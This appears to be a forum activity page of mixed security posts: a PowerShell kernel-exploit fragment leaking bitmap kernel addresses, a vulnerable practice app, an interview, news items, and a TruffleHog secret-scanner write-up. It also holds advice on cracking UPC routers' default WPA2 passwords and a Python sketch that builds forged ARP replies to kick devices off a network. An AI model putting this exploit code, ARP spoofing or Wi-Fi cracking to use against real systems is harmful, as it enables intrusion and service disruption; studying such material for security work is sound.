    $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
    echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
    $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
    echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
} else {
    $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
    echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
    $WorkerKernelObj =
[System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
    echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
}
#==============================================[/Bitmap]

© Copyright FuzzySecurity
Full article: https://www.fuzzysecurity.com/tutorials/expDev/21.html
Damn Vulnerable Web Sockets (DVWS)

Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which uses web sockets for client-server communication. The flow of the application is similar to DVWA. You will find more vulnerabilities than the ones listed in the application.

Requirements

In the hosts file of your attacker machine, create an entry for dvws.local pointing at the IP address hosting the DVWS application.

Location of hosts file:
Windows: C:\windows\System32\drivers\etc\hosts
Linux: /etc/hosts

Sample entry for hosts file:
192.168.100.199 dvws.local

The application requires the following:
Apache + PHP + MySQL
PHP with MySQLi support
Ratchet
ReactPHP-MySQL

Link: https://github.com/interference-security/DVWS
Know your community – Ionut Popescu
January 16, 2017
SecuriTeam Secure Disclosure
Maor Schwartz

When we sponsored DefCamp Romania back in November 2016, I saw Ionut Popescu's lecture "Windows shellcodes: To be continued" and thought to myself, "He must be a key figure in the Romanian security community – I must interview him." So I did!

Introduction

Ionut is working as a Senior Penetration Tester for SecureWorks Romania. Speaker at DefCon and DefCamp, writer of NetRipper and ShellcodeCompiler, and a family man.

Questions

Q: What was your motivation for getting into the security field?

A: First of all, the security field is challenging. It's like a good movie whose main character has to do some tricky moves to find the truth – in the security field it's the same. Second, it's fun: getting access to different systems or exploiting applications. Your friends will think you did something really complicated when you actually exploited a simple vulnerability. My motivations were never (and will never be) fame or money; it's the challenge and the learning.

Q: When did you get into the security field?

A: I got my first computer when I was 16. I used it to play games until I found a small Romanian security forum. I saw that there was a lot of challenging stuff you could do and I became interested in the security field. During this process I learned Visual Basic 6 / HTML / CSS / JS / PHP / MySQL and practiced my web application vulnerability research skills. After some time I became interested in more complicated stuff such as C/C++ and ASM. It was step-by-step learning, where the more you know, the more you realize you don't know.

Q: Since you started, you have found vulnerabilities (in vBulletin, for example) and written exploitation tools like NetRipper and ShellcodeCompiler. Why did you decide to specialize in offensive security?

A: Offensive security is the fun part of security. From my point of view, it is more complicated, more fun and more challenging than defensive security.
Let's take the vBulletin example. I managed a vBulletin installation and I wanted to make sure the forum was secure. I always updated with the latest vBulletin patches, our server was up to date and it even had a few hardening configurations – this is defensive security. But when I decided to take a look at vBulletin on my own, I found an SQL injection. Guess what made me happier – installing patches and keeping a system up to date, or discovering an SQL injection? Since I was young, I have been more attracted to the offensive part of security.

Q: Why did you develop NetRipper and ShellcodeCompiler?
A: A long time ago I discovered that by using API hooking (intercepting Windows function calls) you can do a lot of stuff. While working on an internal penetration test on a limited system, I had the idea that I could capture the traffic made by administration tools in order to pivot to other systems. The idea was not new, but the available tools did not offer what I wanted – a post-exploitation tool to help penetration testers on their engagements. So I started working on NetRipper, which was released at DefCon 23. Recently, being interested in low-level stuff such as ASM and Windows internals, I wanted to write my own shellcodes. I did it easily on Linux, but it was a little bit more complicated on Windows. I noticed that you end up repeating a lot of content from one shellcode to another, so I decided to automate this. This idea was also not new: I had seen a basic shellcode compiler, but its users had to write ASM code. I wanted a fast and easy way to write one. This is how Shellcode Compiler was born.

Q: What is the most innovative project you did as an offensive security researcher?
A: I think the most innovative project I did as a security researcher is Shellcode Compiler. Even if the idea is not new and the tool is really limited, it turns a difficult job into a really easy one, and anyone can write a shellcode.
However, I still need to implement a few features that will make it more useful. I don't have a lot of free time to work on this project, but I always try to make some time for it.

Q: Where did you learn to be an offensive security researcher?
A: I started to learn from security forums. I still remember the hacky0u forums. Now I get most of my technical stuff from Twitter. My tweets are actually a "to read" list. I like to see that a lot of technical people share their knowledge. I read anything that's new from blogs, whitepapers and security conferences. I find Twitter is the central place where I can find all this information by following the right people.

Q: How big is the security community in Romania?
A: The security community in Romania is medium-sized. There are really good security guys in Romania, but many of them don't have the time to share their knowledge. There are security researchers from Romania who have spoken at well-known security conferences and who write tools and whitepapers, but not as many as I would like. In my opinion, it doesn't matter where a researcher is from – we live in an international world, especially in the security research community.

Q: I saw that you are one of the admins of the Romanian security forum called RST Forums. Why did you open the forum? What was the goal? Who helps you manage it?
A: RST Forums is the largest Romanian security community. It is a well-known forum in Romania and most of the content is in Romanian. I did not open this forum; a few other guys did, in 2006. However, they decided to leave the community, and so I am just continuing it. The goal is to help young Romanian newbies learn security. I have friends who visited the forums for game cheats or programming help; eventually they got into the security field and now they are working as penetration testers for large companies. The forum helped a lot of us in our careers, and that's why it is still open.
I hope many other young Romanians will use it as a way to start their careers in the field of information security.

Q: How do you support the security research community today?
A: I don't do as much for the security research community as I would like. The two tools I released, NetRipper and ShellcodeCompiler, were meant to support the research community. I have written various technical articles and whitepapers and spoken at security conferences. Oh, and I also tweet useful technical stuff. It is not much, but it is something, and I hope someone will find my work useful.

Q: Do you have a tool you are working on today? Do you know when you are going to release it?
A: Right now, I would rather work on my current projects. I don't have a new idea for a tool, and it is not a good idea to start one while the existing tools are not as fully-featured and stable as I would like them to be.

It was a pleasure, Ionut, to talk to you and get so much information on the local Romanian community.
You're welcome.

Link: https://blogs.securiteam.com/index.php/archives/2916
-
./ban.sh
-
Do you remember the laptop with 3 screens that Razer presented at CES
Nytro replied to Nytro's topic in Stiri securitate
Here it is: https://zonait.tv/un-laptop-razer-furat-apare-la-vanzare/ -
Yes, correct. I had seen that the passwords generated by those sites have 7 characters, but I didn't count properly: they have 8.
-
The most common method is to capture a handshake and crack the password. In particular for UPC, probably only on certain router models, there is that password "generation" method, because a braindead algorithm is used. If that doesn't work, the default password is, I think, something along those lines. Yes, the password can be changed to whatever the user wants.
-
Apparently, the passwords are 7 characters long and consist only of uppercase letters. Capture a WPA2 handshake and set a cracking mask for the password that covers only this key space.
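As a back-of-the-envelope check on why restricting the mask to this key space matters, here is the arithmetic. The `?u` notation in the comments is standard hashcat mask syntax; the cracking rate is an assumed figure for illustration, not from the post, and another post in this thread corrects the password length from 7 to 8 characters:

```python
# Key space for UPC default passwords: uppercase letters only.
UPPERCASE = 26

keyspace_7 = UPPERCASE ** 7   # mask ?u?u?u?u?u?u?u
keyspace_8 = UPPERCASE ** 8   # mask ?u?u?u?u?u?u?u?u (corrected length)

print(keyspace_7)  # 8031810176   (~8 billion candidates)
print(keyspace_8)  # 208827064576 (~209 billion candidates)

# Assuming ~400k WPA2 guesses/sec on a decent GPU, worst case for 8 chars:
seconds = keyspace_8 / 400_000
print(round(seconds / 86_400, 1))  # about 6 days
```

Compare that with a full 8-character mixed-charset search (95^8, about 6.6 quadrillion candidates): the uppercase-only restriction is what turns an infeasible brute force into a weekend job.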
-
Do you remember the laptop with 3 screens that Razer presented at CES
Nytro replied to Nytro's topic in Stiri securitate
It can probably be found on okazii or olx. -
Romanian smartwatch maker Vector Watch has been acquired by Fitbit
by Raluca Abrihan, 10 January 2017, 11:39

Vector Watch, the Romanian startup making smartwatches with one-month battery life, has been acquired by the American company Fitbit, known for its fitness trackers of the same name. "Today, we are happy to announce that the Vector Watch team and our software platform are joining Fitbit, the market leader in fitness and health wearables," the local startup Vector Watch announced on its official website. The company was launched in 2015, and its majority stake was held by Gecad Ventures, a local investment fund controlled by businessman Radu Georgescu. One year after launch, Vector Watch sells in 25 markets. Besides very large markets such as the USA and Great Britain, the watch has also been launched in exotic markets such as Thailand, Singapore, Malaysia and the Philippines. The watch is sold in over 500 points of sale, including both physical and online stores. Amazon is the main sales channel worldwide, but significant sales are also generated through Orange, with which partnerships have been signed in several countries. For example, the watch is sold in the largest Orange store in Paris, and very recently a partnership was signed with Microsoft UK, so the watch can be bought from the American company's online store, making it one of the few premium smartwatches with a Windows app. Vector Watch has 40 employees. The development team is in Bucharest, a small sales team is in the USA, and there is another sales team for the EMEA region. From a retail and financial point of view the headquarters is in London, where the stock is also held, while Romania hosts the "technology headquarters". Fitbit is the largest player in the wearables market; it sold 5.3 million wearable devices in the second quarter of last year, holding 23% of the market.
Source: http://www.startupcafe.ro/stiri-afaceri-21523479-vector-fitbit-cumparat-vanzare-ceasuri-inteligente.htm
-
Do you remember the laptop with 3 screens that Razer presented at CES? It has been stolen
Adrian Popa - 9 Jan 2017

Razer made waves at CES 2017 with its three-screen laptop. Although only a prototype, the device shows what can be done with today's technology. The computer drew attention again after being stolen from the show on its last day. The thief took two of the company's concept devices, including the three-screen laptop. "I've been informed that two of our prototypes were stolen from our booth at CES today," company CEO Min-Liang Tan wrote on Facebook. The CES organizers and the police have opened an investigation and are trying to find the thief. This is not the first time Razer has drawn the attention of thieves. In 2011, two Blade laptop prototypes were stolen from the company's research and development center in San Francisco. Industrial espionage has not been ruled out either. It is quite possible that the concept devices were stolen by a rival company so they could be studied in detail.

Source: http://www.go4it.ro/curiozitati/va-mai-amintiti-de-laptopul-cu-3-ecrane-prezentat-de-razer-la-ces-a-fost-furat-16053902/
-
Yahoo is gone, its remains become Altaba
by unacomn on 10/01/2017

The acquisition of Yahoo by the American telecommunications conglomerate Verizon has been completed. The deal had been underway since last summer, clearing a few hurdles along the way after Yahoo revealed that it had twice been the victim of the largest hacking incidents in the history of the internet, with half a billion accounts compromised initially, and then a full billion. Still, despite the general outrage at how Yahoo handled the incidents, the acquisition was not affected, and Verizon paid 4.8 billion dollars for what was once the most valuable internet company in the world. Following the acquisition, all of Yahoo's main functions pass under Verizon's control, while the company's investments in Alibaba and other Asian companies will be consolidated under the name Altaba. This component will remain independent and effectively represents everything left of Yahoo that is not Verizon property. Yahoo's current leadership has departed: Marissa Mayer is no longer CEO, company co-founder David Filo is gone, and many of the others who steered the company into its precarious situation will now be looking for other jobs. Yahoo's services will remain in operation, if anyone still uses them. [Ars Technica]

Source: https://zonait.tv/yahoo-nu-mai-exista/
-
-
Does this work? https://ubee.deadcode.me/ https://upc.michalspacek.cz/ http://haxx.in/upc-wifi/
-
KickThemOut - Kick Devices Off Your Network

A tool to kick devices out of your network and enjoy all the bandwidth for yourself. It allows you to select specific or all devices and ARP spoofs them off your local area network. Compatible with Python 2.6 & 2.7.

Authors: Nikolaos Kamarinakis & David Schütz

Installation

You can download KickThemOut by cloning the Git repo and simply installing its requirements:

$ git clone https://github.com/k4m4/kickthemout.git
$ cd kickthemout
$ pip install -r requirements.txt

Demo

Here's a short demo: (For more demos click here)

Disclaimer

KickThemOut is provided as is under the MIT License (as stated below). It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible. In brief, do not use it with evil intent.

License

Copyright (c) 2017 by Nikolaos Kamarinakis & David Schütz. Some rights reserved. KickThemOut is under the terms of the MIT License, following all clarifications stated in the license file. For more information head over to the official project page. You can also go ahead and email me anytime at nikolaskam{at}gmail{dot}com or David at xdavid{at}protonmail{dot}com.

Link: https://github.com/k4m4/kickthemout
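Under the hood, kicking a device off the LAN comes down to sending forged ARP replies that poison the victim's ARP cache, so traffic destined for the gateway goes to the attacker (or nowhere). KickThemOut drives Scapy to do this; the sketch below is not its code, just a stdlib-only illustration of what such a forged frame looks like on the wire, with made-up addresses:

```python
import struct

def build_arp_reply(attacker_mac, victim_mac, gateway_ip, victim_ip):
    """Build a raw Ethernet frame carrying a forged ARP reply that tells
    the victim 'gateway_ip is at attacker_mac'."""
    eth_header = struct.pack("!6s6sH",
                             victim_mac,    # destination MAC
                             attacker_mac,  # source MAC
                             0x0806)        # EtherType: ARP
    arp_packet = struct.pack("!HHBBH6s4s6s4s",
                             1,             # hardware type: Ethernet
                             0x0800,        # protocol type: IPv4
                             6, 4,          # MAC / IP address lengths
                             2,             # opcode 2 = ARP reply
                             attacker_mac, gateway_ip,  # sender (spoofed)
                             victim_mac, victim_ip)     # target
    return eth_header + arp_packet

# Made-up example addresses:
attacker  = bytes(bytearray([0xde, 0xad, 0xbe, 0xef, 0x00, 0x01]))
victim    = bytes(bytearray([0x00, 0x11, 0x22, 0x33, 0x44, 0x55]))
gw_ip     = bytes(bytearray([192, 168, 1, 1]))
victim_ip = bytes(bytearray([192, 168, 1, 10]))

frame = build_arp_reply(attacker, victim, gw_ip, victim_ip)
print(len(frame))  # 42 bytes: 14 (Ethernet header) + 28 (ARP)
```

Actually putting this frame on the wire would need a raw AF_PACKET socket and root privileges, which is exactly what Scapy handles for KickThemOut; it also spoofs both directions (victim and gateway) so the poisoning sticks.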
-
Hacker publishes GitHub secret key hunter

TruffleHog snuffles through your dirty commit drawers. 9 Jan 2017 at 06:56, Team Register

A researcher has published a tool to help administrators delve into GitHub commits to find high-entropy secret keys. The tool, dubbed TruffleHog, is able to locate high-entropy keys in GitHub repositories, potentially saving admins from exposing their networks and sensitive data. TruffleHog developer Dylan Ayrey, who warned of the Pastejack attack last year, says the tool will locate any high-entropy string longer than 20 characters.

"[TruffleHog] searches through git repositories for high entropy strings, digging deep into commit history and branches," Ayrey says. "This is effective at finding secrets accidentally committed that contain high entropy. If at any point a high entropy string >20 characters is detected, it will print to the screen."

TruffleHog in action.

He says it searches the entire commit history of branches, checking each diff in commits and evaluating the Shannon entropy for both the base64 character set and the hexadecimal character set for every blob of text larger than 20 characters and comprised of those character sets in each diff. Reddit users praising the tool have claimed Amazon already searches GitHub for AWS keys and shutters the respective service when any are found. TruffleHog relies only on GitPython. ®

Source: http://www.theregister.co.uk/2017/01/09/hacker_publishes_github_secret_key_hunter/
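The entropy check the article describes is easy to sketch. The following is a minimal illustration of the idea, not TruffleHog's actual code: the 20-character minimum comes from the article, while the exact character sets and the 4.5-bit cutoff are assumptions chosen for this example.

```python
import math

BASE64_CHARS = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz0123456789+/=")

def shannon_entropy(data, charset):
    # Shannon entropy in bits per character over the given charset:
    # H = -sum(p * log2(p)) for each character's frequency p in data.
    if not data:
        return 0.0
    entropy = 0.0
    for ch in charset:
        p = float(data.count(ch)) / len(data)
        if p > 0:
            entropy -= p * math.log(p, 2)
    return entropy

def looks_like_secret(word, threshold=4.5):
    # Flag strings longer than 20 chars whose entropy exceeds the cutoff.
    return len(word) > 20 and shannon_entropy(word, BASE64_CHARS) > threshold

# 32 distinct characters -> exactly log2(32) = 5.0 bits per character
print(looks_like_secret("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef"))  # True
print(looks_like_secret("aaaaaaaaaaaaaaaaaaaaaaaaa"))         # False
```

Note that Shannon entropy here is purely frequency-based, so order is ignored: any long string that draws evenly on many distinct characters scores high, which is why random keys and tokens stand out against prose and repeated filler.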
-